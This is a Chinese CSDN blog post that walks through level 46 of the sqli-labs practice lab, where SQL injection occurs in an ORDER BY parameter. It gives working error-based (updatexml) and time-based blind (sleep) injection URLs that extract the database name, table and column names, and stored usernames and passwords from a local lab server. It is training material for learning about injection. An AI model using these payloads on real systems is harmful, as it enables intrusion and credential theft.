sqli-labs (less-46)

最新推荐文章于 2023-01-12 18:59:14 发布
最新推荐文章于 2023-01-12 18:59:14 发布
阅读量807 收藏 1
点赞数 2
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114798986
版权

sqli-labs (less-46)

进入46关,这时候我们发现屏幕上的显示的不是再要我们属于ID了,而是要我们输入sort,我们输入sort=1试试

我们发现查询的结果是这样的,那为什么我们输入sort=1会输出这些东西呢,我们可以通过查看源代码看看

这里我们发现sql语句为select * from users order by $id;,在原先的语句上加入了order by语句,那到底order by语句是什么意思呢,前面的关卡我们使用了order by语句,但都是都是为了判断字段数,这里我们来讲讲order by语句的作用

SQL语句中,asc是指定列按升序排列,desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by1 asc;使用升序进行排列

这里我们就明白了,原sql语句只有order by后面的参数是我们可控的,所以sort=1的意思就是以第一列数据也就是ID进行排序

http://127.0.0.1/sql1/Less-46/?sort=2


输入sort=2就是以第二列也就是username进行排序

http://127.0.0.1/sql1/Less-46/?sort=3


输入sort=3就是以第三列也就是password进行排序

http://127.0.0.1/sql1/Less-46/?sort=4


输入sort=4发现会报错,因为根本没有第四列数据,这也是order by为什么能作为判断字段数的原因

http://127.0.0.1/sql1/Less-46/?sort=1'


根据错误显示我们判断为数字型注入
这里因为有完整的错误回显,所以我们可以使用报错注入攻击或者使用时间盲注

报错注入攻击

查看当前库

http://127.0.0.1/sql1/Less-46/?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+


查看security库下的所有表

http://127.0.0.1/sql1/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+


查看users表下的所有字段

http://127.0.0.1/sql1/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+


查看username,password字段下的所有值

http://127.0.0.1/sql1/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+

时间盲注

查看当前数据库长度

http://127.0.0.1/sql1/Less-46/?sort=1 and if(length(database())=8,1,sleep(2))--+


页面快速反应,证明当前数据库长度为8

查看当前数据库的第一个字母

http://127.0.0.1/sql1/Less-46/?sort=1 and if(substr(database(),1,1)='s',1,sleep(2))--+


页面快速反应,证明当前库的第一个字母为s,更改substr函数的索引依次往后面猜解,这里我不具体演示

查看当前库下的第一张表的第一个字母

http://127.0.0.1/sql1/Less-46/?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+


页面快速反应,证明当前库下的第一张表的第一个字母为e,更改substr函数的索引依次往后面猜解,这里我不具体演示

查看users表下的第一个字段下的第一个字母

http://127.0.0.1/sql1/Less-46/?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+


页面快速反应,证明users表下的第一个字段的第一个字母为u,更改substr函数的索引依次往后面猜解,这里我不具体演示

查看username,password字段下的第一个值的第一个字母

http://127.0.0.1/sql1/Less-46/?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+

页面快速反应,证明username和password字段下的第一个值的第一个字母为d,更改substr函数的索引依次往后面猜解,这里我不具体演示

时间盲注的特点就是只能一个字母一个字母的去猜,这里也可以发送到burpsuite的intruer模块进行暴力破解,这里我就不演示了,道理都是一样的

super 硕
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1097
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
sqli-labs(54-65)
qq_43395215的博客
08-26 406
文章目录第54关:第55关:第56关:第57关:第58关:第59关:第60关:第61关:第62关:第63关:第64关:第65关: 第54关: 根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会 因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号 闭合方式: /Less-54/?id=-1' union select 1,2,3--+ 因为一直到库名,需要判断表名,注意语句要一次正
Sqli-labs之Less:46-49
→_→
05-16 1197
Less-49 基于错误_GET_数字型_排序注入 这一关首先要说一下的是,在前面的关卡中我们大多是使用 id这个参数来获取到正常的页面,但在这几关中我们要使用 sort 这个参数,因为后台源代码这样设置了 那么接下来我们看一下正常的页面: 我们看到了正常的页面,从中我们也发现了数字的不同,页面给我们呈现出的账号表格中的顺序是不同的,那么这就是我们这几关要说的知识点。 ...
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1602
SQL-堆叠、盲注】
基于Sqli-Labs靶场的SQL注入-46~53关
Joker
01-12 635
这一片博客我主要讲解 Order By注入,其实 Order By注入只是把参数变了,其余的操作都和之前参数为ID的时候大同小异,最大的区别就是 Order By注入不能使用Union联合注入。
sqli-Labs————less-46(order by 之后的注入)
Fly_鹏程万里
05-21 1324
前言从这一关开始将会介绍一下order by相关的注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
sqli-labs(23-37)
qq_43395215的博客
08-26 409
文章目录第23关:第24关:第25关:第26关:第27关:第28关:第29关:第30关:第31关:第32关:第33关:第34关:第35关:第36关:第37关: 第23关: 23关感觉和第1关一样,先用第一关的操作试一试,先判断闭合方式 /Less-23/?id=1' and 1=2 --+ 判断所有的闭合方式都是无效,但是在报错信息里面,有关于“’ LIMIT 0,1’的提示,按理说不应该出现才对,因为我们注入的sql语句后面有注释符,这一部分应该是被注释的,所以应该是注释被屏蔽了,所以我们采用另一种构造
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs(46-49)
qq_43579362的博客
03-01 966
Less-46 这三关是排序注入order by,不同于where后面的注入,它不可以使用union联合查询注入,所以导致前面很多方法不可用,那应该如何注入,来看mysql官方给的select使用文档 可见order by后面可以使用limit,into outfile等语句,还可以跟数字等。 <1>报错注入 正常语句查询 http://127.0.0.1/sqli-labs/Less...
sqli-labs(46)
weixin_30674525的博客
06-03 627
0X01首先我们先来看一下源码 发现查询语句变成了 order by 参数也变成了 sort 看看是什么样的 (1)首先看看本关sql语句 $sql = "SELECT * FROM users ORDER BY $id"; 在mysql中 order by 参数后可以加入升序和降序来改变排列顺序, 我们来看看mysql的帮助函数 0...
SQLI-LAB  的 实战记录(Less 41 - Less 53)
这块盾牌有待改良
07-20 2708
Less - 41 stacked Query Intiger type blind Less - 42 Stacked Query error based Less - 43 stacked Query String type
less-46-47-48-49-50-51-52-53
qq_44598397的博客
04-12 660
LESS-46 1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。) 输入?Sort=1 desc 输入:?Sort=1 asc 两者不同说明这里使用了order by 1、报错注入 输入:http://127...
Less 46 (ORDER BY 后的注入)
老司机开代码的博客
08-04 247
文章目录1. 题目分析2. 注入过程2.1 利用rand()实现布尔盲注2.2 时间盲注2.3 双注入 1. 题目分析 先看一下源码中的SQL $id=$_GET['sort']; $sql = "SELECT * FROM users ORDER BY $id"; 需要注意的是,此处我们输入的参数应该是?sort=xxx,并且后台没有对这个参数进行过滤。 但是和以往不同的是,我们的注入位置不再是WHERE后面,而是在ORDER BY之后。 目前有2中注入思路: 利用rand()实现布尔盲注 时间盲注
sqli-labs (less-5)
kukudeshuo的博客
03-07 3305
sqli-labs (less-5) 第五关和前面的四关就不一样了,当我们输入id=1时,页面不会再返回用户名和密码,而是返回了 You are in… 输入 http://127.0.0.1/sql1/Less-5/?id=1' 这里报错,根据错误信息我们判断为字符型注入 判断字段数 http://127.0.0.1/sql1/Less-5/?id=1' order by 3--+ http://127.0.0.1/sql1/Less-5/?id=1' order by 4--+ 判断字段数为
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值